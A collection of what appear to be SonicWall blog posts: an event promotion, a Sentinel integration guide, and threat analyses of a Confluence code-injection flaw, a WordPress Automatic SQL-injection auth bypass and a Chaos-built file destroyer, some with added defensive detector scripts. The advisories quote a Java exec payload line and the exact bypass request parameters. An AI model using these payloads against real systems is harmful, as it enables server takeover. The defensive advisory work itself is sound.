  • Exclusive demonstrations of our latest technological advancements, including Cloud Secure Edge 
  • A sneak peek at how our recent acquisitions can help grow and diversify your business 
  • A preview of upcoming network security solutions  
  • An interactive learning experience about minimizing alert fatigue and leveraging opportunities with SonicWall MDR’s 24×7 SOC protection 
  • Breakout sessions, workshops, and Q&A to boost your knowledge and skills 

And that’s not all. Networking events and receptions will offer a chance to network, share stories and exchange success tips with other business leaders! 

Connect With the SonicWall Team

Don’t miss the chance to interact with our executive leaders. These industry veterans are eager to engage with you and share valuable insights. Our team includes: 

  • Bob VanKirk, President and CEO
  • Jason Carter, Chief Revenue Officer   
  • Michael Crean, EVP of Managed Services   
  • Michelle Ragusa-McBain, VP of Global Channel   
  • Chandro Prasad, EVP Product Management and Product Marketing   
  • Christine Bartlett, Chief Marketing Officer   
  • Tarun Desikan, VP of Cloud Security   
  • Osca St. Marthe, EVP Solution Engineers, Sales & Partner Enablement   
  • Ryan Matlock, Chief Customer Success Officer   

Get Ready for an Elevated Experience!

Join us in Dallas, USA, from June 12-14, 2024, Lisbon, Portugal, from June 26-28, 2024, or Bali, Indonesia from July 10-12, 2024, by registering on our Elevate 2024 portal. You can find registration links and the agendas for each event in the table below. We look forward to seeing you there! For more information about Elevate 2024, contact us or visit the Elevate homepage.

Elevate 2024 Agendas and Registration (registration and agenda links are provided per event)

Location            Dates
Dallas, USA         June 12-14, 2024
Lisbon, Portugal    June 26-28, 2024
Bali, Indonesia     July 10-12, 2024

Confluence Data Center and Server Remote Code Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is software for managing documentation and knowledge bases, with a ubiquitous presence across the globe. Identified as CVE-2024-21683, Confluence Data Center and Server before versions 8.9.1 (Data Center only), 8.5.9 LTS and 7.19.22 LTS allow an authenticated threat actor with the privilege of adding new macro languages to execute arbitrary code, earning a high CVSS score of 8.3. Confluence users are encouraged to upgrade their instances to the latest fixed version, as mentioned by the vendor in the advisory.

Technical Overview

This vulnerability arises due to a flaw in the input validation mechanism in the ‘Add a new language’ function of the ‘Configure Code Macro’ section. This function allows users to upload a new code block macro language definition to customize the formatting and syntax highlighting. It expects the JavaScript file to be formatted according to the custom brush syntax. Insufficient validation allows the authenticated attacker to inject malicious Java code embedded in the file, such as java.lang.Runtime.getRuntime().exec("touch /tmp/poc"), which will be executed on the server.

Triggering the Vulnerability

Leveraging the vulnerability mentioned above requires the attacker to meet the below prerequisites.

  1. The attacker must have network access to the target vulnerable system.
  2. The attacker must have the privilege to add new macro languages.
  3. The forged JavaScript language file containing malicious Java code needs to be uploaded via Configure Code Macro > Add a new language.

The following steps will walk through the process of exploitation and the measures taken to address the vulnerability in the updated version. We used Confluence versions 8.5.0 and 8.5.9 in our tests.

To begin with, the attacker uploads the language file containing malicious Java code (similar to the one mentioned above) on the page seen in Figure 1.

Figure 1: Add a new language page

The payload will be sent for evaluation to the ‘parseLanguage’ method of the ‘RhinoLanguageParser’ class, which can be found at the below location:

WEB-INF/atlassian-bundled-plugins/com.atlassian.confluence.ext.newcode-macro-plugin-5.0.1.jar!/com/atlassian/confluence/ext/code/languages/impl/RhinoLanguageParser.class

The ‘script’ variable will be formed and the ‘evaluateString’ method will process the payload, as illustrated in Figure 2.

Figure 2: Payload evaluation by RhinoLanguageParser

If we step into the function, the ‘evaluateString’ method further passes control to the ‘doTopCall’ method of the ‘ScriptRuntime’ class, as seen in Figure 3. So far, the behavior of the vulnerable and fixed versions is identical.

Figure 3: Execution of the payload by ScriptRuntime class

The result of executing the ‘doTopCall’ method (shown in Figure 3) differs between the vulnerable and fixed versions. In the fixed version (8.5.9), ‘doTopCall’ throws a ‘RhinoException’, control jumps directly to line 92 and execution of the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class is abruptly terminated, as seen in Figure 4. Thanks to enhanced checks, Java references in the uploaded file cannot be resolved, and the exception message reads ‘java is not defined’.

Figure 4: Abruptly terminated execution in fixed version

On the other hand, the vulnerable version (8.5.0) lets ‘doTopCall’ run to completion and hence lets the ‘evaluateString’ method of the ‘RhinoLanguageParser’ class complete. It also throws an ‘InvalidLanguageException’ later on, but only after the injected malicious Java code has already executed, as seen in Figure 5.

Figure 5: Malicious code execution in a vulnerable version

Although both the vulnerable and fixed versions of the Confluence server display similar errors on the GUI, as seen in Figure 6, the damage has already been done in the vulnerable version.

Figure 6: Common error on GUI
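As an added screening step (my example, not Atlassian’s fix and not Confluence code), the function below scans an uploaded brush definition for identifiers that reach the JVM through Rhino’s Java bridge, the same ‘java’ root the fixed version refuses to resolve. The sample brush is constructed and only reuses the page’s own payload line; upgrading remains the fix, this is defense in depth for an upload gate.

```python
import re

# Top-level names through which Rhino's LiveConnect bridge exposes the JVM to
# scripts; the 'java' in the fixed version's "java is not defined" message is
# one of them. Treated here as the set of identifiers to screen for.
JAVA_BRIDGE_ROOTS = ("Packages", "java", "javax", "org", "com", "edu", "net")

# A bridge reference starts a member chain: the root is not itself preceded
# by '.', '$' or a word character (so a property such as config.java is not
# flagged) and is followed by '.' or '['.
_BRIDGE_RE = re.compile(
    r"(?<![\w$.])(" + "|".join(JAVA_BRIDGE_ROOTS) + r")\s*(?=[.\[])"
)


def find_java_bridge_refs(brush_source: str) -> list[tuple[int, str]]:
    """Return (line_number, line_text) pairs that reference the Java bridge.

    Comments and string literals are not stripped on purpose: a hit there is a
    false positive worth a human look rather than a silent pass.
    """
    hits = []
    for lineno, line in enumerate(brush_source.splitlines(), start=1):
        if _BRIDGE_RE.search(line):
            hits.append((lineno, line.strip()))
    return hits


# Constructed sample in the SyntaxHighlighter-style brush shape the page
# describes; line 5 is the page's own payload, line 3 is a harmless property.
SAMPLE_BRUSH = """\
SyntaxHighlighter.brushes.Demo = function() {
    this.regexList = [ { regex: /\\/\\/.*$/gm, css: 'comments' } ];
    var settings = config.java;
};
java.lang.Runtime.getRuntime().exec("touch /tmp/poc");
SyntaxHighlighter.brushes.Demo.aliases = ['demo'];
"""

if __name__ == "__main__":
    for lineno, text in find_java_bridge_refs(SAMPLE_BRUSH):
        print(f"reject upload: line {lineno}: {text}")
```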

Exploitation

Exploitation of this vulnerability gives a remote threat actor the ability to execute arbitrary code on the server. It has a high impact on the confidentiality, integrity and availability of the system and does not require user interaction.

To achieve remote code execution, the forged JavaScript language file with the crafted payload is uploaded, producing the request seen in the top portion of Figure 7. This request creates the file ‘/tmp/poc’ named in the payload, as seen in the bottom portion of Figure 7.

Figure 7: Malformed request (above) and RCE in vulnerable instance (below)

Additionally, the payload can be modified to yield a reverse shell as seen in Figure 8.

Figure 8: Achieving reverse shell

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4437 Atlassian Confluence Data Center and Server RCE
  • IPS: 4438 Atlassian Confluence Data Center and Server RCE 2

Remediation Recommendations

Considering Confluence Server’s pivotal role in maintaining an organization’s knowledge base, users are strongly encouraged to upgrade their instances to the latest versions, as mentioned in the vendor advisory.

Relevant Links

Better Together: Integrating Microsoft Sentinel with SonicWall Firewalls

Getting Started

As cyber threats continue to evolve, organizations need robust security solutions to detect, respond to and prevent incidents. Microsoft Sentinel, a cloud-native Security Information and Event Management (SIEM) solution, provides intelligent security analytics and threat intelligence across the enterprise. SonicWall Next-Generation Firewalls (NGFWs), on the other hand, are a trusted network security solution that protects your network from external threats. Integrating these two products can significantly enhance your security operations.

Understanding Microsoft Sentinel and SonicWall Firewalls

Microsoft Sentinel
Microsoft Sentinel is a scalable, cloud-native SIEM and Security Orchestration, Automation and Response (SOAR) solution. It helps uncover sophisticated threats and respond decisively, bringing proactive threat detection and hunting, threat investigation and response into one place. Microsoft Sentinel also provides a consolidated way to acquire content such as data connectors, workbooks, analytics and automations.

SonicWall Firewalls
SonicWall NGFWs provide the security, control and visibility to maintain an effective cybersecurity posture. SonicWall firewalls are designed to meet your specific security and usability needs, all at a cost that will protect your budget while securing your network infrastructure.

Features like stateful high availability and power supply redundancy deliver ‘always-on’ continuity, while superior UX and simpler, single-pane-of-glass management ease complexity. And with SD-WAN and DPI-SSL included, they offer an industry-leading TCO.

Features and Functionality

The integration of SonicWall NGFWs with Microsoft Sentinel can help organizations achieve a higher level of holistic visibility, security, real-time threat detection and response automation for their security infrastructure. These integration capabilities will enable our partners and customers to forward the firewall logs to the Microsoft Sentinel cloud platform, parse the logs, create custom workflows and automate the responses.

Configuration Steps

Integration can be configured in these simple steps:

1. Deploying a Microsoft Sentinel Workspace

  • Create a new resource using a custom template that builds the resources needed for Microsoft Sentinel.

2. Installing the SonicWall Solution for Microsoft Sentinel

  • Install the pre-defined “SonicWall Network Security” solution from the Microsoft Sentinel Content hub.
  • Configure the Common Event Format (CEF) via AMA data connector’s data collection rule to set the event filter types (Syslog facilities) to collect.
  • Configure the collection rules:
    • LOG_LOCAL* (0-7) to LOG_DEBUG
    • LOG_SYSLOG to LOG_DEBUG
    • LOG_USER to LOG_DEBUG

3. Installing the Operations Management Suite (OMS) or Log Analytics Agent

  • The OMS/Log Analytics Agent provides a syslog relay. Install this agent on a host within the network and configure SonicOS to send ArcSight-formatted syslog data to it. The agent establishes a secure connection with Azure, so the log data is not sent to the cloud in plaintext.

4. Configuring a Syslog Server on a SonicWall Firewall

  • Configure a syslog server on your SonicWall NGFW and select Syslog Format as ArcSight (CEF) from the dropdown.
  • Specify the IP address/name of your Linux VM as the Syslog server, and Syslog Facility should be Local use 4.
    Note: Refer to this Knowledge Base Article for more information.
  • Validate that the OMS/Log Analytics Agent is receiving CEF messages and can connect to Azure.

5. Microsoft Sentinel Workbooks for SonicWall Firewalls

  • The “SonicWall Network Security” data connector includes workbooks containing a variety of queries for our various security services, as well as other traffic and security insights. You can configure the analytics rule, hunting query and workbooks as per your requirements.
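To perform the validation step in step 4 before the data reaches the workbooks, here is an added Python check (my example, not SonicWall’s or Microsoft’s tooling) that parses one syslog-wrapped CEF line as the relay would see it, confirms the facility is Local use 4 and splits the CEF header into its fields. The sample line is constructed, not a captured firewall message.

```python
import re

LOCAL4 = 20  # syslog facility "Local use 4", as selected on the SonicWall in step 4
SYSLOG_RE = re.compile(r"^<(?P<pri>\d{1,3})>(?P<rest>.*)$", re.DOTALL)
CEF_KEYS = ("version", "vendor", "product", "device_version",
            "signature_id", "name", "cef_severity")


def parse_syslog_cef(line: str) -> dict:
    """Parse a syslog line carrying a CEF payload into its header fields.

    Raises ValueError when the line is not syslog-wrapped CEF or when its
    facility is not Local use 4, so a misconfigured sender fails loudly.
    """
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError("missing syslog <PRI> prefix")
    facility, severity = divmod(int(m.group("pri")), 8)  # PRI = facility*8 + severity
    if facility != LOCAL4:
        raise ValueError(f"facility {facility} is not Local use 4 ({LOCAL4})")
    rest = m.group("rest")
    idx = rest.find("CEF:")
    if idx < 0:
        raise ValueError("no CEF header found")
    # CEF separates its seven header fields with '|'; a literal pipe inside a
    # field is escaped as '\|', so split only on unescaped pipes.
    parts = re.split(r"(?<!\\)\|", rest[idx:], maxsplit=7)
    if len(parts) != 8:
        raise ValueError("malformed CEF header")
    fields = {k: v.replace("\\|", "|") for k, v in zip(CEF_KEYS, parts[:7])}
    fields["version"] = fields["version"][len("CEF:"):]
    fields["extension"] = parts[7]          # key=value pairs, left unparsed here
    fields["syslog_facility"] = facility
    fields["syslog_severity"] = severity
    return fields


# Constructed sample: PRI 166 = 20*8 + 6 (local4, informational); the CEF
# header values are placeholders, not real SonicWall event identifiers.
SAMPLE = ("<166>Jan  1 12:00:00 sonicwall CEF:0|SonicWall|Firewall|0.0|EXAMPLE|"
          "Constructed test event|3|src=10.0.0.5 dst=203.0.113.10 msg=Allowed")

if __name__ == "__main__":
    print(parse_syslog_cef(SAMPLE))
```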

Benefits of Integration

The integration of Microsoft Sentinel and SonicWall NGFWs offers several benefits for enhancing your organization’s security posture.

  • Holistic View: Microsoft Sentinel provides a bird’s-eye view across your infrastructure, reducing the stress of handling sophisticated attacks and numerous alerts.
  • Real-time Threat Detection: By ingesting SonicWall logs, you enhance your threat detection capabilities and gain visibility into network traffic, user behavior, and potential security incidents.
  • Threat Visibility and Proactive Hunting: Azure Sentinel provides intelligent security analytics, threat intelligence, and proactive hunting capabilities. It allows you to detect threats across your environment and respond promptly.
  • Automated Response: Combine Microsoft Sentinel’s SOAR capabilities with SonicWall’s real-time data to automate incident response. You can create/use playbooks to execute predefined actions based on specific events. This combination provides robust protection against evolving threats.

Availability

The SonicWall Firewalls and Microsoft Sentinel cloud platform integration is now available to all of our partners/customers.

For more detailed instructions, please refer to the SonicWall Firewall-Sentinel Integration Guide. Here is the data connector instructions article.

Better Together

Integrating the Microsoft Sentinel cloud platform with SonicWall Firewalls is a strategic move for organizations seeking comprehensive security. By leveraging the power of both platforms, you can proactively defend against threats, streamline incident responses, and stay ahead in the ever-evolving cybersecurity landscape.

Remember, security is a continuous journey, and this integration is a significant step toward a safer digital environment. Happy securing! 🔒🌐

We appreciate your continuous support, and please don’t hesitate to contact us if you have any queries or require more information. 😊

WordPress Unauthenticated Arbitrary SQL Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability, an SQL injection in the WordPress plugin Automatic by ValvePress, assessed its impact and developed mitigation measures for it. Around 38k active users have installed this premium plugin. The issue allows trivial SQL injection attacks against the plugin’s authentication process, which could allow WordPress website takeovers. The SQL vulnerability is identified as CVE-2024-27956 and was assigned a critical CVSSv3 score of 9.9. Considering the sizeable user base, low attack complexity and publicly available exploit code, including a simple SQL query, WordPress users are strongly encouraged to upgrade their instances to the latest version of the Automatic plugin (3.92.1 or later) with utmost priority.

Technical Overview

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted SQL query to the web server.

The WordPress Automatic plugin, developed by Valvepress, is popularly known for automatically posting content from any website. It can import content from popular sites like YouTube, Flickr, Vimeo, Twitter and other social media platforms utilizing the APIs from almost any website. It can also generate content using OpenAI’s ChatGPT.

CVE-2024-27956 arises from improper neutralization of special elements used in an SQL command. This allows unauthenticated actors to bypass the normal authentication process and inject SQL code that grants them elevated privileges. That in turn allows threat actors to create admin-level user accounts, upload malicious files and take full control of affected sites. Out of the 5.5 million attacks observed, as reported by HackerNews in the last week of March 2024, attackers were seen changing the name of the vulnerable file “inc/csv.php” and renaming sensitive files to prevent the site owner or rival hackers from controlling the hijacked site. Once a WordPress site is under their control, attackers ensure the longevity of their access by creating backdoors and modifying the code.

Triggering the Vulnerability

The flaw exists in “inc/csv.php”, which generally resides under the plugin installation directory. A typical path to the vulnerable file is “/wp-content/plugins/wp-automatic/inc/csv.php”. It is also shown in our PoC demonstration in Figure 2.

Any requester can supply an arbitrary SQL query in the $q variable, as shown in Figure 1. This variable is then executed on line 32 of Figure 1 with $wpdb->get_results( $q ).

Figure 1: inc/csv.php

Prior to execution, there are basic authentication and integrity checks.

  • The first check involves $current_user->user_pass. This value is an empty string when an unauthenticated user accesses the file.
  • The second check compares $integ with an MD5 that incorporates $current_user->user_pass; since that value is an empty string, the MD5 of the supplied SQL query alone satisfies it.
  • Additionally, before those two checks, there is a check of if(wp_automatic_trim($auth == '')), which means one can’t simply supply an empty string in $auth.
  • To bypass this, an attacker can supply a single whitespace character (" ") in $auth as &auth=%00 and achieve arbitrary SQL query execution.

An example POST request to trigger the vulnerability would look like:

http[:]//target-ip:port/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

The authentication parameter contains whitespace, as shown in Figure 2.
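As an added detection example (my code, not the plugin’s logic and not SonicWall’s signature), the function below inspects one HTTP request for the pattern just described: the csv.php endpoint, an auth value that is blank once NUL bytes and whitespace are stripped, and an integ equal to md5(q) alone, which is only possible when no logged-in user’s password was mixed in. The sample request is constructed and carries a harmless SELECT rather than an exploit query.

```python
import hashlib
from urllib.parse import urlsplit, unquote_to_bytes

VULN_PATH_SUFFIX = "/wp-content/plugins/wp-automatic/inc/csv.php"


def _params(query: str) -> dict:
    """Decode k=v&k=v pairs, keeping an embedded %00 instead of dropping it."""
    out = {}
    for pair in query.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            out[unquote_to_bytes(k).decode("latin-1")] = unquote_to_bytes(v).decode("latin-1")
    return out


def assess_request(method: str, url: str, body: str = "") -> dict:
    """Flag a request that matches the CVE-2024-27956 bypass pattern."""
    parts = urlsplit(url)
    verdict = {"target_endpoint": parts.path.endswith(VULN_PATH_SUFFIX),
               "reasons": [], "suspicious": False}
    if not verdict["target_endpoint"]:
        return verdict
    p = _params(body if method.upper() == "POST" else parts.query)
    q, auth, integ = p.get("q", ""), p.get("auth"), p.get("integ", "")
    # Bypass signature 1: an auth value that is blank once NULs/whitespace are stripped
    if auth is not None and auth.strip(" \t\r\n\x00") == "":
        verdict["reasons"].append("blank or NUL auth parameter")
    # Bypass signature 2: integ equals md5(q) with no user password mixed in
    if q and integ and hashlib.md5(q.encode("latin-1")).hexdigest() == integ.lower():
        verdict["reasons"].append("integ equals md5(q) alone")
    if q:
        verdict["reasons"].append("raw SQL supplied in q")
    verdict["suspicious"] = len(verdict["reasons"]) >= 2
    return verdict


# Constructed sample request (harmless SELECT, not an exploit query)
SAMPLE_URL = "http://wp.example.test/wp-content/plugins/wp-automatic/inc/csv.php"
SAMPLE_BODY = "q=SELECT%201&auth=%00&integ=" + hashlib.md5(b"SELECT 1").hexdigest()

if __name__ == "__main__":
    print(assess_request("POST", SAMPLE_URL, SAMPLE_BODY))
```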

Exploiting the Vulnerability

To exploit the issue, a WordPress setup with ValvePress’ vulnerable WordPress Automatic plugin (versions before 3.92.1) is needed. An attacker only needs to be able to reach the instance remotely, whether over the internet or a local network. A working PoC with a crafted SQL query aids in exploiting this vulnerability.

A demonstration of exploitation based on the publicly available PoC can be seen in Figure 2 (below).

Figure 2: CVE-2024-27956 Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

IPS: 19918 – WordPress Automatic Plugin SQL Injection

Remediation Recommendations

Considering the severe consequences of this vulnerability and the observed trend of threat actors leveraging the exploit in the wild, users are strongly encouraged to update their instances to WP Automatic plugin version 3.92.1 or later to remove the vulnerability.

Relevant Links

Politically Charged Ransomware Weaponized as a File Destroyer

The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit; however, it is not intended to work as traditional ransomware, but rather as a file destroyer. The intent appears to be the destruction of files in response to Italy’s stance on the Israel-Palestine conflict. It purports to be created on behalf of the Italian Socialist Party and is likely aimed at infecting machines within the Italian government’s infrastructure.

Infection Cycle

The malware uses the following icon:

Upon infection, files on the system are encrypted. Each file is given a file extension consisting of four random alphanumeric characters. As this malware is intended to destroy files, the decryption key is probably not stored by the attackers for file retrieval later on in exchange for money. A file named “Leggimi.txt” (“Read me” in Italian) is dropped into directories containing encrypted files. It contains the following message in Italian:

A rough translation of that message is as follows:

—————————- -Ransomware route

Italy must be punished for its alliance with the fascist state
By Israel, this malware was scheduled by Marxisti-Leninisti-Maoisti
To spread the anti-medical thought. Of the Palestinians are dying for Your actions, I will kill your files. There is no way to recover them.

Palestine Libera
Italy Red Unit and Socialists

The message makes no mention of file decryption for payment and no contact information is presented. Any encrypted files are therefore irretrievable.

Reverse engineering the malware reveals a list of targeted file extensions:

We can also see a list of directories that are targeted:

An image file is embedded in the malware executable file. It is base64 encoded:

After decoding the image, it is displayed as the desktop wallpaper:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Cambiare_Rotta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.
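An added triage script (my example, not part of the analysis above) that looks for the two filesystem indicators named in this post: the “Leggimi.txt” note and clusters of files whose appended extension is four random alphanumeric characters. The directory it scans is a constructed fixture, not real malware output.

```python
import os
import re
import tempfile
from collections import Counter

NOTE_NAME = "Leggimi.txt"                         # ransom note named in the analysis
RANDOM_EXT_RE = re.compile(r"^[A-Za-z0-9]{4}$")   # four random alphanumerics
# Legitimate four-character extensions that would otherwise look random;
# extend this per environment to keep false positives down.
KNOWN_EXTS = {"json", "html", "xlsx", "docx", "pptx", "jpeg", "yaml", "toml",
              "conf", "java", "text", "webp", "mpeg", "xlsm", "docm"}


def scan_tree(root: str, min_cluster: int = 5) -> dict:
    """Report ransom notes and directories holding a cluster of random-extension files."""
    notes, per_dir = [], Counter()
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name == NOTE_NAME:
                notes.append(os.path.join(dirpath, name))
                continue
            ext = name.rsplit(".", 1)[1] if "." in name else ""
            if RANDOM_EXT_RE.match(ext) and ext.lower() not in KNOWN_EXTS:
                per_dir[dirpath] += 1
    hit_dirs = sorted(d for d, n in per_dir.items() if n >= min_cluster)
    return {"notes": sorted(notes), "clustered_dirs": hit_dirs,
            "likely_infected": bool(notes or hit_dirs)}


def build_fixture(root: str) -> str:
    """Create a constructed post-infection layout under root; returns the hit directory."""
    victim = os.path.join(root, "Documents")
    os.makedirs(victim, exist_ok=True)
    for i, ext in enumerate(["Ab3Z", "q9Kd", "Z0xY", "m4Tn", "P7wQ", "u2Lc"]):
        with open(os.path.join(victim, f"report{i}.docx.{ext}"), "w") as fh:
            fh.write("encrypted-placeholder")
    with open(os.path.join(victim, NOTE_NAME), "w") as fh:
        fh.write("Palestine Libera\n")
    clean = os.path.join(root, "Projects")        # untouched directory, must not be flagged
    os.makedirs(clean, exist_ok=True)
    with open(os.path.join(clean, "settings.json"), "w") as fh:
        fh.write("{}")
    return victim


def demo() -> dict:
    """Build the fixture in a temporary directory, scan it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = build_fixture(tmp)
        report = scan_tree(tmp)
        report["victim_dir_flagged"] = victim in report["clustered_dirs"]
        return report


if __name__ == "__main__":
    print(demo())
```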